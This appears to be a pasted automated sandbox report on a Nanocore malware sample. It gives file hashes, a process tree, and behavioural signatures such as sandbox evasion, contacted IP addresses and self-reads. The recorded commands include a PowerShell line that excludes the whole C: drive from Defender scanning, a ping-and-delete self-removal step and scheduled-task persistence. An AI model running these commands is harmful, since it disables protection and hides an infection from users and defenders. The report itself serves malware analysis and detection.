Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Nanocore"
- * MalScore: 10.0
- * File Name: "Exes_b74568d64360d5a29bc46ba1ff214e1f.exe"
- * File Size: 702976
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
- * SHA256: "9ba204fc6b15ab19005f46f7039f020873bd66f344870e99d64580d6b30bb14c"
- * MD5: "b74568d64360d5a29bc46ba1ff214e1f"
- * SHA1: "31db0432eb36b671cb567d3679f6352e9ea29f9b"
- * SHA512: "a0f5aed901a9a24f35ca3d7de9eb47989c22e14d2710a21c0de7d916870048804faf5b41cd60f93b8c7fe2e8654440eabd561f1277a0c7eedcda6077132169db"
- * CRC32: "43DD83BC"
- * SSDEEP: "12288:2anmrqJK6/cwtvdWEDPtCZphH5Xl5LqVatQSoxKuL82VkoLK7hvZsB9aOroz+n:zmmh3d3D0ZphVl5GMhKnLnhKtvZeYOX"
- * Process Execution:
- "Exes_b74568d64360d5a29bc46ba1ff214e1f.exe",
- "powershell.exe",
- "images.exe",
- "powershell.exe",
- "z.nlfG.zF.exe",
- "wscript.exe",
- "etx.exe",
- "etx.exe",
- "RegSvcs.exe",
- "schtasks.exe",
- "schtasks.exe",
- "kB.bDFDD..exe",
- "images.exe",
- "powershell.exe",
- "xH.C.oIjg.exe",
- "wscript.exe",
- "etx.exe",
- "etx.exe",
- "RegSvcs.exe",
- "qDABnKekr.exe",
- "powershell.exe",
- "cmd.exe",
- "qDABnKekr.exe",
- "powershell.exe",
- ".rprs.B.d.exe",
- "wscript.exe",
- "etx.exe",
- "etx.exe",
- "RegSvcs.exe",
- "cmd.exe",
- "PING.EXE",
- "powershell.exe",
- "cmd.exe",
- "PING.EXE",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "svchost.exe",
- "WMIADAP.exe",
- "svchost.exe",
- "svchost.exe",
- "svchost.exe",
- "svchost.exe",
- "lsass.exe",
- "svchost.exe",
- "svchost.exe",
- "WerFault.exe",
- "lsass.exe",
- "lsass.exe"
- * Executed Commands:
- "powershell Add-MpPreference -ExclusionPath C:\\",
- "C:\\Users\\user\\AppData\\Roaming\\z.nlfG.zF.exe ",
- "C:\\Users\\user\\AppData\\Roaming\\kB.bDFDD..exe ",
- "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q \"C:\\ProgramData\\images.exe\"",
- "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
- "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
- "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\hqc.vbs\"",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\hqc.vbs ",
- "C:\\Windows\\System32\\svchost.exe -k NetworkService",
- "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted",
- "C:\\Windows\\system32\\lsass.exe",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "\"C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe\" por=iwi",
- "etx.exe por=iwi",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\WKZDQ",
- "C:\\Users\\user\\AppData\\Roaming\\xH.C.oIjg.exe ",
- "C:\\Users\\user\\AppData\\Roaming\\qDABnKekr.exe ",
- "\"schtasks.exe\" /create /f /tn \"DSL Subsystem\" /xml \"C:\\Users\\user\\AppData\\Local\\Temp\\tmp6BE8.tmp\"",
- "\"schtasks.exe\" /create /f /tn \"DSL Subsystem Task\" /xml \"C:\\Users\\user\\AppData\\Local\\Temp\\tmp953B.tmp\"",
- "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1212 -s 968",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\ONKAZ",
- "C:\\Users\\user\\AppData\\Roaming\\.rprs.B.d.exe ",
- "C:\\Windows\\system32\\PING.EXE ping 1.2.3.4 -n 2 -w 1000",
- "C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\etx.exe C:\\Users\\user\\AppData\\Local\\Temp\\71619484\\GYTEI"
- * Signatures Detected:
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Attempts to connect to a dead IP:Port (4 unique times)",
- "Details":
- "IP": "66.154.103.133:80"
- "IP": "172.217.5.110:80"
- "IP": "185.62.188.169:80"
- "IP": "79.134.225.32:20202"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "etx.exe, PID 2552"
- "Description": "Detected script timer window indicative of sleep style evasion",
- "Details":
- "Window": "WSH-Timer"
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "RegSvcs.exe tried to sleep 756 seconds, actually delayed analysis time by 0 seconds"
- "Process": "WmiPrvSE.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
- "Process": "images.exe tried to sleep 503 seconds, actually delayed analysis time by 0 seconds"
- "Process": "svchost.exe tried to sleep 300 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Loads a driver",
- "Details":
- "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
- "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
- "Details":
- "ioc": "v2.0.50727"
- "Description": "Network anomalies occured during the analysis.",
- "Details":
- "Anomaly": "'1.2.3.4' getaddrinfo with no actual connection to the IP."
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: images.exe, pid: 2476, offset: 0x00000000, length: 0x000aba00"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00000007, length: 0x0016356a"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00043de0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00045dd0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00047dc0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00049db0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0004bda0, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0004dd90, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0004fd80, length: 0x00002000"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00050a00, length: 0x00000031"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00050a19, length: 0x0010ef19"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0015fae7, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0015fd14, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0015fef8, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001600eb, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001602ff, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001604ed, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001606b5, length: 0x00000027"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001608b2, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00160a9c, length: 0x00000029"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00160c77, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00160eaa, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001610b3, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001612a2, length: 0x00000029"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161474, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161643, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x0016180b, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161a04, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161c14, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161dde, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00161fdc, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001621ee, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001623c0, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001625a9, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00162777, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00162989, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00162b62, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00162d50, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x00162f27, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001630fe, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001632d5, length: 0x00000028"
- "self_read": "process: z.nlfG.zF.exe, pid: 976, offset: 0x001634b8, length: 0x0000001b"
- "self_read": "process: wscript.exe, pid: 1316, offset: 0x00000000, length: 0x00000040"
- "self_read": "process: wscript.exe, pid: 1316, offset: 0x000000f0, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1316, offset: 0x000001e8, length: 0x00000078"
- "self_read": "process: wscript.exe, pid: 1316, offset: 0x00018000, length: 0x00000020"
- "self_read": "process: wscript.exe, pid: 1316, offset: 0x00018058, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1316, offset: 0x000181a8, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 1316, offset: 0x00018470, length: 0x00000010"
- "self_read": "process: wscript.exe, pid: 1316, offset: 0x00018640, length: 0x00000012"
- "self_read": "process: images.exe, pid: 2520, offset: 0x00000000, length: 0x000aba00"
- "self_read": "process: RegSvcs.exe, pid: 2912, offset: 0x00000000, length: 0x00001000"
- "self_read": "process: RegSvcs.exe, pid: 2912, offset: 0x00000080, length: 0x00000200"
- "self_read": "process: RegSvcs.exe, pid: 2912, offset: 0x00000178, length: 0x00000200"
- "self_read": "process: RegSvcs.exe, pid: 2912, offset: 0x00005b20, length: 0x00000200"
- "self_read": "process: RegSvcs.exe, pid: 2912, offset: 0x00005b3c, length: 0x00000200"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00000007, length: 0x0016356a"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00043de0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00045dd0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00047dc0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00049db0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0004bda0, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0004dd90, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0004fd80, length: 0x00002000"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00050a00, length: 0x00000031"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00050a19, length: 0x00001bba"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x000e9c02, length: 0x0000002c"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x000ff9c4, length: 0x00000026"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x000ffa3d, length: 0x0000002a"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015d85b, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015da50, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015dc28, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015de57, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e028, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e208, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e40e, length: 0x00000027"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e5de, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e7dd, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015e9d3, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015ebd3, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015ed9e, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015ef6f, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015f149, length: 0x00000029"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015f326, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015f502, length: 0x00000027"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015f706, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015f90a, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015fae7, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015fd14, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0015fef8, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001600eb, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001602ff, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001604ed, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001606b5, length: 0x00000027"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001608b2, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00160a9c, length: 0x00000029"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00160c77, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00160eaa, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001610b3, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001612a2, length: 0x00000029"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161474, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161643, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0016180b, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161a04, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161c14, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161dde, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00161fdc, length: 0x00000050"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00162216, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001623e8, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001625d1, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x0016279f, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001629b1, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00162b8a, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00162d78, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00162f4f, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x00163126, length: 0x00000028"
- "self_read": "process: xH.C.oIjg.exe, pid: 1140, offset: 0x001632fd, length: 0x0000001b"
- "self_read": "process: wscript.exe, pid: 2340, offset: 0x00000000, length: 0x00000040"
- "self_read": "process: wscript.exe, pid: 2340, offset: 0x000000f0, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2340, offset: 0x000001e8, length: 0x00000078"
- "self_read": "process: wscript.exe, pid: 2340, offset: 0x00018000, length: 0x00000020"
- "self_read": "process: wscript.exe, pid: 2340, offset: 0x00018058, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2340, offset: 0x000181a8, length: 0x00000018"
- "self_read": "process: wscript.exe, pid: 2340, offset: 0x00018470, length: 0x00000010"
- "self_read": "process: wscript.exe, pid: 2340, offset: 0x00018640, length: 0x00000012"
- "self_read": "process: qDABnKekr.exe, pid: 4032, offset: 0x00000000, length: 0x000aba00"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00000007, length: 0x0016356a"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00043de0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00045dd0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00047dc0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00049db0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0004bda0, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0004dd90, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0004fd80, length: 0x00002000"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00050a00, length: 0x00000031"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x00050a19, length: 0x00001bba"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x000e9c02, length: 0x0000002c"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x000ff9c4, length: 0x00000026"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x000ffa3d, length: 0x0000002a"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015d85b, length: 0x00000028"
- "self_read": "process: .rprs.B.d.exe, pid: 3824, offset: 0x0015da50, length: 0x00000028"
